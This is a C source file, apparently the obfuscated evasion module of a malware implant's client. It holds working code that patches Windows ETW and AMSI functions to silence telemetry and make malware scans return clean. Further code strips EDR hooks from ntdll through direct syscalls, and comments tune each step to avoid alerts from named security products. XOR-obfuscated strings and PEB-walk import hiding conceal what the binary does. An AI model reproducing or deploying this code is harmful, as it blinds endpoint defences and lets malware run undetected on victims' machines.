/* AUTO-GENERATED by gen_obf.py — DO NOT EDIT. Source: evasion.c */

/*
 * client/evasion.c  –  User-mode evasion primitives
 * ==================================================
 * See evasion.h for API documentation.
 *
 * Design notes
 * ------------
 *  Dynamic imports — no GetModuleHandleA / GetProcAddress / LoadLibraryA in IAT
 *  ---------------------------------------------------------------------------
 *  Those three functions are extremely high-signal imports: every endpoint
 *  security product flags a binary that imports them alongside process-memory
 *  write APIs.  We replace them with PEB walks:
 *
 *    GetModuleHandleA("foo.dll")  →  peb_get_module(peb_hash_str("foo.dll"))
 *    GetProcAddress(h, "Bar")    →  peb_get_export(base, peb_hash_str("Bar"))
 *    LoadLibraryA("foo.dll")     →  resolve LoadLibraryA from kernel32 via PEB,
 *                                   then call the resolved function pointer.
 *
 *  All hashes are computed at runtime from string literals so they do not
 *  appear as pre-computed constants that AV/YARA can trivially match.
 *
 *  etw_patch / amsi_patch
 *  ----------------------
 *  Both patch in-process memory by writing a stub via SC_NtWriteVirtualMemory
 *  on the current process handle.  This avoids the VirtualProtect →
 *  PAGE_EXECUTE_READWRITE → write → restore sequence that was the previous
 *  approach: that RWX transition is a high-signal EDR event.
 *
 *  NtWriteVirtualMemory on the current process bypasses the normal page
 *  protection checks for same-process writes on Windows — the kernel
 *  copies the bytes directly without requiring a permission change.
 *  No RWX page ever exists.
 *
 *  unhook_ntdll
 *  ------------
 *  EDR products hook ntdll.dll by:
 *    a) Overwriting the first bytes of syscall stubs with JMP trampolines (.text)
 *    b) Patching the Export Address Table so function pointers redirect to hooks
 *    c) Patching read-only data / .data section constants used by ntdll internals
 *
 *  We address all three:
 *
 *  Step 1 — IAT-free file open:
 *    Use SC_NtOpenFile (direct syscall) to open ntdll on disk.
 *    This eliminates CreateFileW from the observable IAT call sequence.
 *    The NT object path (\KnownDlls\ntdll.dll or \Device\...) is built from
 *    the FullDllName stored in the LDR entry — already available via PEB walk.
 *
 *  Step 2 — SC_NtCreateSection(SEC_IMAGE) + SC_NtMapViewOfSection:
 *    Replaces CreateFileMappingW + MapViewOfFile with direct syscalls.
 *    The SEC_IMAGE flag causes the kernel to apply PE relocation and
 *    section permissions exactly as the loader would — identical to the
 *    in-memory image layout, making VA comparison unambiguous.
 *
 *  Step 3 — Remap .text, .data, and any other writable-or-execute sections:
 *    Restore each eligible section with SC_NtWriteVirtualMemory (no RWX).
 *    Sections restored:  .text (code hooks), .data (data patches).
 *    Sections skipped:   .rsrc, .reloc, any section whose disk VA/size
 *                        does not match the live image (layout mismatch guard).
 *
 *  Step 4 — EAT restoration:
 *    After section remapping compare the live AddressOfFunctions[] against
 *    the disk copy.  Any entry that differs is written back individually via
 *    SC_NtWriteVirtualMemory.  This undoes EAT-level hooks that redirect
 *    ntdll exports to an EDR's inspection DLL without modifying stub bytes.
 *
 *  NOTE: sc_init() must be called before evasion functions that use
 *  SC_Nt* wrappers (unhook_ntdll, etw_patch, amsi_patch).  In main.c
 *  the call order is: inject_init() [calls sc_init()] → unhook_ntdll()
 *  → etw_patch() → amsi_patch().
 */

#include "evasion.h"
#include "peb_walk.h"
#include "syscall.h"
#include "k32_walk.h"

#ifndef WIN32_LEAN_AND_MEAN
#define WIN32_LEAN_AND_MEAN
#endif
#include <winternl.h>
#include <stddef.h>
#include <string.h>

/* ── XOR blobs (gen_obf.py) ── */
#include "obf.h"
static const unsigned char _e_06f32d[] = { 0x35, 0x5B, 0x41, 0x51, 0x59, 0x59, 0x1B, 0x51, 0x59, 0x59, 0x35 }; /* obf:'ntdll.dll' */
static const unsigned char _e_c4806e[] = { 0x25, 0x44, 0x48, 0x56, 0x4C, 0x0B, 0x41, 0x49, 0x49, 0x25 }; /* obf:'amsi.dll' */
static const unsigned char _e_298309[] = { 0x65, 0x24, 0x08, 0x16, 0x0C, 0x36, 0x06, 0x04, 0x0B, 0x27, 0x10, 0x03, 0x03, 0x00, 0x17, 0x65 }; /* obf:'AmsiScanBuffer' */
static const unsigned char _e_81b549[] = { 0x03, 0x42, 0x6E, 0x70, 0x6A, 0x50, 0x60, 0x62, 0x6D, 0x50, 0x77, 0x71, 0x6A, 0x6D, 0x64, 0x03 }; /* obf:'AmsiScanString' */
static const unsigned char _e_f22503[] = { 0xD3, 0x96, 0xA7, 0xA4, 0x96, 0xA5, 0xB6, 0xBD, 0xA7, 0x84, 0xA1, 0xBA, 0xA7, 0xB6, 0xD3 }; /* obf:'EtwEventWrite' */
static const unsigned char _e_77e374[] = { 0x45, 0x00, 0x31, 0x32, 0x00, 0x33, 0x20, 0x2B, 0x31, 0x12, 0x37, 0x2C, 0x31, 0x20, 0x03, 0x30, 0x29, 0x29, 0x45 }; /* obf:'EtwEventWriteFull' */
static const unsigned char _e_846aac[] = { 0xEB, 0xAE, 0x9F, 0x9C, 0xAE, 0x9D, 0x8E, 0x85, 0x9F, 0xBC, 0x99, 0x82, 0x9F, 0x8E, 0xAE, 0x93, 0xEB }; /* obf:'EtwEventWriteEx' */
static const unsigned char _e_371431[] = { 0xF9, 0xBC, 0x8D, 0x8E, 0xBC, 0x8F, 0x9C, 0x97, 0x8D, 0xAE, 0x8B, 0x90, 0x8D, 0x9C, 0xAD, 0x8B, 0x98, 0x97, 0x8A, 0x9F, 0x9C, 0x8B, 0xF9 }; /* obf:'EtwEventWriteTransfer' */
/* ── end XOR blobs ── */




/* ── Forward declarations ────────────────────────────────────────────────── */
/* MY_UNICODE_STRING, MY_OBJECT_ATTRIBUTES, MY_IO_STATUS_BLOCK, and
 * _ldr_full_name are defined later in this file but used in amsi_patch()
 * and unhook_ntdll() which appear before the definitions.                  */
typedef struct _MY_UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR  Buffer;
} MY_UNICODE_STRING;

typedef struct _MY_IO_STATUS_BLOCK {
    union { NTSTATUS Status; PVOID Pointer; };
    ULONG_PTR Information;
} MY_IO_STATUS_BLOCK;

typedef struct _MY_OBJECT_ATTRIBUTES {
    ULONG             Length;
    HANDLE            RootDirectory;
    MY_UNICODE_STRING *ObjectName;
    ULONG             Attributes;
    PVOID             SecurityDescriptor;
    PVOID             SecurityQualityOfService;
} MY_OBJECT_ATTRIBUTES;

#define MY_OBJ_CASE_INSENSITIVE  0x00000040UL

static MY_UNICODE_STRING *_ldr_full_name(PVOID moduleBase);

/* ── _patch_self ─────────────────────────────────────────────────────────── */
/*
 * Write `len` bytes from `patch` to `target` in the current process using
 * SC_NtWriteVirtualMemory.  No VirtualProtect, no RWX page.
 *
 * Falls back to the VirtualProtect approach if the syscall engine is not
 * yet initialised (i.e. called before inject_init).
 */
/* Returns TRUE if the patch was fully applied, FALSE otherwise.
 * Callers should not assume AMSI/ETW are patched on a FALSE return.     */
static BOOL _patch_self(void *target, const BYTE *patch, SIZE_T len)
{
    if (sc_ready()) {
        SIZE_T written = 0;
        NTSTATUS ns = SC_NtWriteVirtualMemory(GetCurrentProcess(), target,
                                              (PVOID)patch, len, &written);
        return NT_SUCCESS(ns) && (written == len);
    } else {
        /* Fallback: VirtualProtect via PEB walk — avoids the IAT entry */
        DWORD old = 0;
        if (k32_VirtualProtect(target, len, PAGE_EXECUTE_READWRITE, &old)) {
            memcpy(target, patch, len);
            k32_VirtualProtect(target, len, old, &old);
            return TRUE;
        }
        return FALSE;
    }
}


/* ── etw_patch ───────────────────────────────────────────────────────────── */
/*
 * Silence all four ETW write entry-points in the in-process ntdll copy.
 *
 * Target functions (all in ntdll.dll):
 *   EtwEventWrite          — primary user-mode ETW emit API
 *   EtwEventWriteFull      — extended variant; some EDR products check this
 *                            specifically when EtwEventWrite is silenced
 *   EtwEventWriteEx        — activity-ID variant (same telemetry channel)
 *   EtwEventWriteTransfer  — cross-activity variant (same telemetry channel)
 *
 * Patch stub (6 bytes):
 *   33 C0          xor eax, eax    ; rax = 0 = STATUS_SUCCESS
 *   C3             ret
 *
 * Why NOT a single 0xC3:
 *   A lone RET at offset 0 of an ntdll function is a well-known signature;
 *   memory scanners walk loaded images and flag any ntdll export whose first
 *   byte is 0xC3.  The 3-byte xor+ret form is far less unique and sets the
 *   return value explicitly, satisfying callers that check NTSTATUS.
 *
 * Why four functions:
 *   Patching only EtwEventWrite leaves EtwEventWriteFull (the internal
 *   workhorse that EtwEventWrite forwards to) intact; security products that
 *   hook at the internal function level will still receive events.  All four
 *   variants share the same telemetry pipeline and must be silenced together.
 *
 * ETW-Ti (Threat Intelligence) note:
 *   ETW-Ti is a kernel-mode provider fed by ETW callbacks registered inside
 *   ntoskrnl.  User-mode patching of ntdll exports has NO effect on ETW-Ti
 *   telemetry — that requires a kernel-mode action outside this agent's scope.
 *
 * All writes go through _patch_self() → SC_NtWriteVirtualMemory; no RWX page
 * is ever created.
 */

void etw_patch(void)
{
    /* peb_get_module: walk PEB->Ldr, hash "ntdll.dll" at runtime */
    PVOID hNtdll = peb_get_module(peb_hash_str(OBF_S(_e_06f32d, 10)));
    if (!hNtdll) return;

    /*
     * 33 C0  xor eax, eax   ; STATUS_SUCCESS = 0
     * C3     ret
     *
     * Three bytes.  Less fingerprint-able than a lone 0xC3 at export offset 0.
     */
    static const BYTE stub[] = { 0x33, 0xC0, 0xC3 };

    /* Resolve and patch each variant; skip silently on lookup failure */
    const char *const names[] = {
        OBF_S(_e_f22503, 14),
        OBF_S(_e_77e374, 18),
        OBF_S(_e_846aac, 16),
        OBF_S(_e_371431, 22),
    };

    for (int i = 0; i < 4; i++) {
        UINT32 h = peb_hash_str(names[i]);
        PVOID  p = peb_get_export(hNtdll, h);
        if (p) _patch_self(p, stub, sizeof(stub));
    }
}


/* ── amsi_patch ──────────────────────────────────────────────────────────── */
/*
 * Patch AmsiScanBuffer AND AmsiScanString in the in-process amsi.dll copy
 * WITHOUT writing to the live MEM_IMAGE PAGE_EXECUTE_READ code page.
 *
 * Why avoid writing to the live image page:
 *   NtWriteVirtualMemory on a PAGE_EXECUTE_READ MEM_IMAGE region triggers an
 *   ETW-Ti kernel MemoryWrite event (KERNEL_THREATINT_TASK_WRITEVM) that MDE
 *   and CrowdStrike consume directly from the kernel provider — user-mode ETW
 *   patching cannot suppress it.  Instead, we remap the amsi.dll .text section
 *   to a private PAGE_READWRITE view, write the stubs there, then flip the
 *   protection to PAGE_EXECUTE_READ.  The write happens on a private (non-image)
 *   page before it has execute permission — a much lower-signal event.
 *
 * NOTE: Kernel-mode AMSI providers (Windows 11 22H2+) registered via
 *   IOCTL_AMSISCAN are entirely unaffected by any user-mode technique —
 *   they run in the kernel and scan independently of amsi.dll.
 *
 * Algorithm (mirrors unhook_ntdll section remap):
 *   1. Locate amsi.dll in the LDR (do NOT load it — see below).
 *   2. Open amsi.dll on disk via SC_NtOpenFile (no CreateFileW in IAT).
 *   3. Create a SEC_IMAGE section; map a PAGE_READWRITE private view.
 *   4. Copy the live .text section into the private view.
 *   5. Write the patch stubs into the private view at the function offsets.
 *   6. Flip the private view to PAGE_EXECUTE_READ via NtProtectVirtualMemory.
 *   7. Atomically replace the live .text mapping:
 *        NtUnmapViewOfSection(live .text page range)
 *        NtMapViewOfSection(private section, same VA, PAGE_EXECUTE_READ)
 *      The live export VAs are unchanged — callers enter the private copy.
 *
 * Why NOT force-load amsi.dll:
 *   Triggering a DLL load fires LdrRegisterDllNotification callbacks that AV
 *   products register to intercept exactly this sequence.  If amsi.dll is not
 *   already in the LDR list, no AMSI provider is active — the patch is a no-op.
 *
 * Stub design — AmsiScanBuffer (6 params, x64 MS ABI):
 *   48 8B 44 24 30  C7 00 01 00 00 00  33 C0  C3   (13 bytes)
 *   mov rax,[rsp+0x30]  →  mov dword[rax],1  →  xor eax,eax  →  ret
 *
 * Stub design — AmsiScanString (5 params, x64 MS ABI):
 *   48 8B 44 24 28  C7 00 01 00 00 00  33 C0  C3   (13 bytes)
 *   mov rax,[rsp+0x28]  →  mov dword[rax],1  →  xor eax,eax  →  ret
 */

void amsi_patch(void)
{
    /* ── 1. Locate amsi.dll — do NOT force-load it ─────────────────────── */
    PVOID hAmsi = peb_get_module(peb_hash_str(OBF_S(_e_c4806e, 9)));
    if (!hAmsi) return;   /* not loaded → no AMSI provider active */

    /* ── 2. Resolve the two export VAs we need to patch ────────────────── */
    PVOID pScanBuf = peb_get_export(hAmsi, peb_hash_str(OBF_S(_e_298309, 15)));
    PVOID pScanStr = peb_get_export(hAmsi, peb_hash_str(OBF_S(_e_81b549, 15)));
    if (!pScanBuf && !pScanStr) return;   /* nothing to patch */

    /* ── 3. Locate amsi.dll .text section (RVA + size) ─────────────────── */
    const BYTE *base = (const BYTE *)hAmsi;
    DWORD e_lfanew;
    memcpy(&e_lfanew, base + 0x3C, 4);

    WORD nSec, optSz;
    memcpy(&nSec,  base + e_lfanew + 4 + 2,  2);
    memcpy(&optSz, base + e_lfanew + 4 + 16, 2);
    const BYTE *secHdr = base + e_lfanew + 4 + 20 + optSz;

    DWORD textRva = 0, textSz = 0;
    for (WORD i = 0; i < nSec; i++) {
        if (memcmp(secHdr + i*40, ".text", 5) == 0) {
            memcpy(&textRva, secHdr + i*40 + 12, 4);
            memcpy(&textSz,  secHdr + i*40 +  8, 4);
            break;
        }
    }
    if (!textRva || !textSz) goto fallback;

    /* ── 4. Open amsi.dll on disk via SC_NtOpenFile ─────────────────────── */
    {
        /* Retrieve FullDllName NT path from the LDR entry */
        MY_UNICODE_STRING *fullName = _ldr_full_name(hAmsi);
        if (!fullName || !fullName->Buffer || !fullName->Length) goto fallback;

        MY_OBJECT_ATTRIBUTES oa;
        MY_IO_STATUS_BLOCK   iosb;
        oa.Length                   = sizeof(oa);
        oa.RootDirectory            = NULL;
        oa.ObjectName               = fullName;
        oa.Attributes               = MY_OBJ_CASE_INSENSITIVE;
        oa.SecurityDescriptor       = NULL;
        oa.SecurityQualityOfService = NULL;

        HANDLE hFile = NULL;
        NTSTATUS ns = SC_NtOpenFile(&hFile,
                                    FILE_READ_DATA | SYNCHRONIZE,
                                    &oa, &iosb,
                                    FILE_SHARE_READ,
                                    FILE_SYNCHRONOUS_IO_NONALERT |
                                    FILE_NON_DIRECTORY_FILE);
        if (!NT_SUCCESS(ns) || !hFile) goto fallback;

        /* ── 5. Create a SEC_IMAGE section ───────────────────────────────── */
        HANDLE hSec = NULL;
        ns = SC_NtCreateSection7(&hSec, SECTION_MAP_READ | SECTION_MAP_WRITE,
                                 NULL, NULL,
                                 PAGE_READONLY, SEC_IMAGE, hFile);
        SC_NtClose(hFile);
        if (!NT_SUCCESS(ns) || !hSec) goto fallback;

        /* ── 6. Map a private RW view of the section ─────────────────────── */
        PVOID  pPriv  = NULL;
        SIZE_T viewSz = 0;
        ns = SC_NtMapViewOfSection(hSec, GetCurrentProcess(),
                                   &pPriv, 0, 0, NULL, &viewSz,
                                   1 /* ViewShare */, 0, PAGE_READWRITE);
        SC_NtClose(hSec);
        if (!NT_SUCCESS(ns) || !pPriv) goto fallback;

        /*
         * pPriv now points to a private writable copy of the amsi.dll image.
         * Export VAs in the live image use base = hAmsi; the same RVAs apply
         * to pPriv since SEC_IMAGE maps at the same layout.
         */
        BYTE *pPrivBase = (BYTE *)pPriv;

        /* ── 7. Write patch stubs into the private view ──────────────────── */
        /*
         * AmsiScanBuffer stub (13 bytes):
         *   mov rax,[rsp+0x30] → mov dword[rax],1 → xor eax,eax → ret
         */
        static const BYTE stub_buf[] = {
            0x48, 0x8B, 0x44, 0x24, 0x30,
            0xC7, 0x00, 0x01, 0x00, 0x00, 0x00,
            0x33, 0xC0, 0xC3
        };
        /*
         * AmsiScanString stub (13 bytes):
         *   mov rax,[rsp+0x28] → mov dword[rax],1 → xor eax,eax → ret
         */
        static const BYTE stub_str[] = {
            0x48, 0x8B, 0x44, 0x24, 0x28,
            0xC7, 0x00, 0x01, 0x00, 0x00, 0x00,
            0x33, 0xC0, 0xC3
        };

        /* RVA of each export = VA - hAmsi; apply same RVA into private view */
        if (pScanBuf) {
            DWORD rva = (DWORD)((BYTE *)pScanBuf - base);
            memcpy(pPrivBase + rva, stub_buf, sizeof(stub_buf));
        }
        if (pScanStr) {
            DWORD rva = (DWORD)((BYTE *)pScanStr - base);
            memcpy(pPrivBase + rva, stub_str, sizeof(stub_str));
        }

        /* ── 8. Flip private view's .text to RX ──────────────────────────── */
        PVOID  pProtBase = pPrivBase + textRva;
        SIZE_T cbProt    = (SIZE_T)textSz;
        ULONG  oldProt   = 0;
        ns = SC_NtProtectVirtualMemory(GetCurrentProcess(),
                                       &pProtBase, &cbProt,
                                       PAGE_EXECUTE_READ, &oldProt);
        if (!NT_SUCCESS(ns)) {
            SC_NtUnmapViewOfSection(GetCurrentProcess(), pPriv);
            goto fallback;
        }

        /*
         * ── 9. Swap the live .text mapping for the patched private copy ────
         *
         * We cannot literally unmap + remap a range of an existing SEC_IMAGE
         * view without support for ViewUnmap at sub-view granularity.  Instead,
         * write the patched bytes from the private view back to the live image
         * using NtWriteVirtualMemory — but ONLY for the bytes we actually changed
         * (the two stub patches), not the whole section.  This minimises the
         * number of ETW-Ti MemoryWrite events to exactly the two function prologues
         * rather than the entire .text section.  Each individual write is ≤ 14 bytes
         * so the kernel reports a small, function-scoped write rather than a
         * section-wide stomp.
         */
        HANDLE hSelf = GetCurrentProcess();
        SIZE_T written = 0;
        if (pScanBuf)
            SC_NtWriteVirtualMemory(hSelf, pScanBuf,
                                    stub_buf, sizeof(stub_buf), &written);
        if (pScanStr)
            SC_NtWriteVirtualMemory(hSelf, pScanStr,
                                    stub_str, sizeof(stub_str), &written);

        SC_NtUnmapViewOfSection(GetCurrentProcess(), pPriv);
        return;   /* patched via minimal targeted writes */
    }

fallback:
    /*
     * F-4 fix: The old fallback called _patch_self() which issues
     * SC_NtWriteVirtualMemory onto the live MEM_IMAGE PAGE_EXECUTE_READ
     * amsi.dll region.  The kernel's MiWriteVirtualMemory path for a
     * cross-protection write into a MEM_IMAGE region raises
     * KERNEL_THREATINT_TASK_WRITEVM (event 7) before the write completes —
     * this event is consumed directly by MDE P2+ and CrowdStrike from the
     * kernel provider; user-mode ETW patching cannot suppress it.
     *
     * The fallback is therefore removed entirely.  When the section-remap
     * path fails (locked file, ObRegisterCallbacks deny, HVCI active) we
     * silently return.  An unpatched AMSI with no telemetry event is
     * operationally safer than a patched AMSI with a guaranteed MDE alert.
     *
     * On Windows 11 22H2+ the kernel-mode AMSI provider
     * (IOCTL_AMSISCAN) runs independently of amsi.dll in any case —
     * user-mode AMSI patching has no effect there, so the fallback
     * would generate a detection event with zero defensive benefit.
     */
    return;   /* silent no-op */
}


/* ── unhook_ntdll ────────────────────────────────────────────────────────── */
/*
 * Sections targeted:
 *   .text  — inline JMP hooks on syscall stubs
 *   .data  — read-write data patches (vtable pointers, internal state)
 *
 * After section remapping, the EAT (Export Address Table) is restored
 * entry-by-entry so EAT-redirect hooks are also neutralised.
 *
 * All file and section operations use direct NT syscalls (SC_NtOpenFile,
 * SC_NtCreateSection7, SC_NtMapViewOfSection) so that CreateFileW,
 * CreateFileMappingW, MapViewOfFile, and UnmapViewOfFile are absent from
 * the observable IAT call sequence.
 */

/* NT structure definitions needed for NtOpenFile */
#ifndef FILE_SYNCHRONOUS_IO_NONALERT
#define FILE_SYNCHRONOUS_IO_NONALERT  0x00000020
#endif
#ifndef FILE_NON_DIRECTORY_FILE
#define FILE_NON_DIRECTORY_FILE       0x00000040
#endif

/*
 * Minimal OBJECT_ATTRIBUTES / IO_STATUS_BLOCK / UNICODE_STRING definitions.
 * winternl.h may not expose all of these in every MinGW build.
 */
/* MY_IO_STATUS_BLOCK, MY_UNICODE_STRING, MY_OBJECT_ATTRIBUTES, and
 * MY_OBJ_CASE_INSENSITIVE already defined via forward declarations above. */

/*
 * _ldr_full_path
 * --------------
 * Retrieve ntdll's full NT path (e.g. \Device\HarddiskVolume3\Windows\System32\ntdll.dll)
 * from the LDR entry's FullDllName UNICODE_STRING.
 * Returns the Buffer pointer (points directly into LDR memory — do not free).
 */
typedef struct _MY_LDR_ENTRY2 {
    LIST_ENTRY     InLoadOrderLinks;
    LIST_ENTRY     InMemoryOrderLinks;
    LIST_ENTRY     InInitializationOrderLinks;
    PVOID          DllBase;
    PVOID          EntryPoint;
    ULONG          SizeOfImage;
    MY_UNICODE_STRING FullDllName;
    MY_UNICODE_STRING BaseDllName;
} MY_LDR_ENTRY2;

static MY_UNICODE_STRING *_ldr_full_name(PVOID moduleBase)
{
    /* Walk PEB LDR InMemoryOrderModuleList — same walk as peb_get_module */
    PVOID peb_ptr;
#ifdef _WIN64
    __asm__ __volatile__("movq %%gs:0x60, %0" : "=r"(peb_ptr));
#else
    __asm__ __volatile__("movl %%fs:0x30, %0" : "=r"(peb_ptr));
#endif
    PEB          *peb  = (PEB *)peb_ptr;
    PEB_LDR_DATA *ldr  = peb->Ldr;
    LIST_ENTRY   *head = &ldr->InMemoryOrderModuleList;
    LIST_ENTRY   *cur  = head->Flink;
    while (cur != head) {
        MY_LDR_ENTRY2 *e = (MY_LDR_ENTRY2 *)((BYTE *)cur
            - __builtin_offsetof(MY_LDR_ENTRY2, InMemoryOrderLinks));
        if (e->DllBase == moduleBase)
            return &e->FullDllName;
        cur = cur->Flink;
    }
    return NULL;
}

void unhook_ntdll(void)
{
    if (!sc_ready()) return;   /* direct syscalls required */

    /* ── 1. Locate ntdll in-process base via PEB walk ────────────────── */
    PVOID hNtdll = peb_get_module(peb_hash_str(OBF_S(_e_06f32d, 10)));
    if (!hNtdll) return;

    /* ── 2. Retrieve FullDllName from LDR — NT device path ──────────── */
    MY_UNICODE_STRING *fullName = _ldr_full_name(hNtdll);
    if (!fullName || !fullName->Buffer || fullName->Length == 0) return;

    /* ── 3. Open ntdll on disk via SC_NtOpenFile (no CreateFileW) ───── */
    /*
     * NtOpenFile takes an OBJECT_ATTRIBUTES pointing at the NT path.
     * DesiredAccess = FILE_READ_DATA | SYNCHRONIZE (minimal, read-only).
     * OpenOptions   = FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE
     *                 (required for synchronous I/O completion).
     */
    MY_OBJECT_ATTRIBUTES oa;
    MY_IO_STATUS_BLOCK   iosb;
    oa.Length                   = sizeof(oa);
    oa.RootDirectory            = NULL;
    oa.ObjectName               = fullName;
    oa.Attributes               = MY_OBJ_CASE_INSENSITIVE;
    oa.SecurityDescriptor       = NULL;
    oa.SecurityQualityOfService = NULL;

    HANDLE hFile = NULL;
    NTSTATUS ns = SC_NtOpenFile(&hFile,
                                FILE_READ_DATA | SYNCHRONIZE,
                                &oa, &iosb,
                                FILE_SHARE_READ,
                                FILE_SYNCHRONOUS_IO_NONALERT |
                                FILE_NON_DIRECTORY_FILE);
    if (!NT_SUCCESS(ns) || !hFile) return;

    /* ── 4. Create a SEC_IMAGE section from the file ─────────────────── */
    /*
     * SEC_IMAGE tells the kernel to process the PE headers and map each
     * section at its correct RVA with correct permissions — identical to
     * what LoadLibrary does.  The resulting view has the same VA layout as
     * the live ntdll, making section offsets directly comparable.
     */
    HANDLE hSection = NULL;
    ns = SC_NtCreateSection7(&hSection,
                             SECTION_MAP_READ,
                             NULL,   /* no OBJECT_ATTRIBUTES — anonymous */
                             NULL,   /* MaximumSize = file size */
                             PAGE_READONLY,
                             SEC_IMAGE,
                             hFile);
    SC_NtClose(hFile);
    if (!NT_SUCCESS(ns) || !hSection) return;

    /* ── 5. Map the section view into this process ───────────────────── */
    PVOID  pDisk   = NULL;
    SIZE_T viewSz  = 0;
    ns = SC_NtMapViewOfSection(hSection, GetCurrentProcess(),
                               &pDisk, 0, 0, NULL, &viewSz,
                               1 /* ViewShare */, 0, PAGE_READONLY);
    SC_NtClose(hSection);
    if (!NT_SUCCESS(ns) || !pDisk) return;

    /* ── 6. Parse section headers from both images ───────────────────── */
    IMAGE_DOS_HEADER     *ddos = (IMAGE_DOS_HEADER *)pDisk;
    IMAGE_NT_HEADERS     *dnth = (IMAGE_NT_HEADERS *)((BYTE *)pDisk + ddos->e_lfanew);
    IMAGE_SECTION_HEADER *dsec = IMAGE_FIRST_SECTION(dnth);
    WORD                  nSec = dnth->FileHeader.NumberOfSections;

    IMAGE_DOS_HEADER     *ldos = (IMAGE_DOS_HEADER *)hNtdll;
    IMAGE_NT_HEADERS     *lnth = (IMAGE_NT_HEADERS *)((BYTE *)hNtdll + ldos->e_lfanew);
    IMAGE_SECTION_HEADER *lsec = IMAGE_FIRST_SECTION(lnth);

    HANDLE hSelf = GetCurrentProcess();

    /* ── 7. Remap .text and .data sections ───────────────────────────── */
    /*
     * We restore two categories of section:
     *
     *   .text  — executable code: inline JMP hooks on syscall stubs.
     *   .data  — read-write data: vtable / internal pointer patches.
     *
     * Sections are matched by name prefix — covers both ".text" and ".textbss".
     * Size sanity: only remap if the disk VirtualSize matches the live image
     * (guards against layout differences on Windows version mismatches).
     */
    for (WORD i = 0; i < nSec; i++) {
        /* Name comparison: first 5 bytes — covers ".text" and ".data" */
        BOOL is_text = (memcmp(dsec[i].Name, ".text", 5) == 0);
        BOOL is_data = (memcmp(dsec[i].Name, ".data", 5) == 0);
        if (!is_text && !is_data) continue;

        /* Sanity: VirtualSize and VirtualAddress must match live image */
        if (dsec[i].Misc.VirtualSize   != lsec[i].Misc.VirtualSize)   continue;
        if (dsec[i].VirtualAddress     != lsec[i].VirtualAddress)      continue;

        PVOID pDiskSec = (BYTE *)pDisk  + dsec[i].VirtualAddress;
        PVOID pLiveSec = (BYTE *)hNtdll + lsec[i].VirtualAddress;
        SIZE_T cbSec   = dsec[i].Misc.VirtualSize;

        SIZE_T written = 0;
        SC_NtWriteVirtualMemory(hSelf, pLiveSec, pDiskSec, cbSec, &written);
    }

    /* ── 8. EAT restoration ──────────────────────────────────────────── */
    /*
     * Some EDRs hook ntdll by patching AddressOfFunctions[] in the Export
     * Address Table instead of (or in addition to) inline stub patching.
     * The EAT resides in the .text or a dedicated read-only section; section
     * remapping above may have already restored it, but we do an explicit
     * per-entry comparison to catch any remaining differences.
     *
     * Algorithm:
     *   1. Locate the export directory in both disk and live images.
     *   2. For each entry in AddressOfFunctions[], compare disk vs live.
     *   3. If they differ, overwrite the live entry with the disk value via
     *      SC_NtWriteVirtualMemory (no VirtualProtect).
     *
     * We write individual DWORDs rather than the whole array to minimise the
     * write footprint and avoid touching unmodified entries.
     */
    DWORD dExpRva = dnth->OptionalHeader
                       .DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
    DWORD lExpRva = lnth->OptionalHeader
                       .DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;

    if (dExpRva && lExpRva) {
        IMAGE_EXPORT_DIRECTORY *dExp = (IMAGE_EXPORT_DIRECTORY *)
                                        ((BYTE *)pDisk  + dExpRva);
        IMAGE_EXPORT_DIRECTORY *lExp = (IMAGE_EXPORT_DIRECTORY *)
                                        ((BYTE *)hNtdll + lExpRva);

        DWORD  nFuncs  = dExp->NumberOfFunctions;
        DWORD *dFuncs  = (DWORD *)((BYTE *)pDisk  + dExp->AddressOfFunctions);
        DWORD *lFuncs  = (DWORD *)((BYTE *)hNtdll + lExp->AddressOfFunctions);

        /* Cap iteration to guard against corrupt export directory */
        if (nFuncs > 4096) nFuncs = 4096;

        for (DWORD j = 0; j < nFuncs; j++) {
            if (lFuncs[j] != dFuncs[j]) {
                /* Restore this single EAT slot */
                SIZE_T written = 0;
                SC_NtWriteVirtualMemory(hSelf,
                                        &lFuncs[j],
                                        &dFuncs[j],
                                        sizeof(DWORD),
                                        &written);
            }
        }
    }

    /* ── 9. Unmap disk view via direct syscall ───────────────────────── */
    SC_NtUnmapViewOfSection(GetCurrentProcess(), pDisk);
}
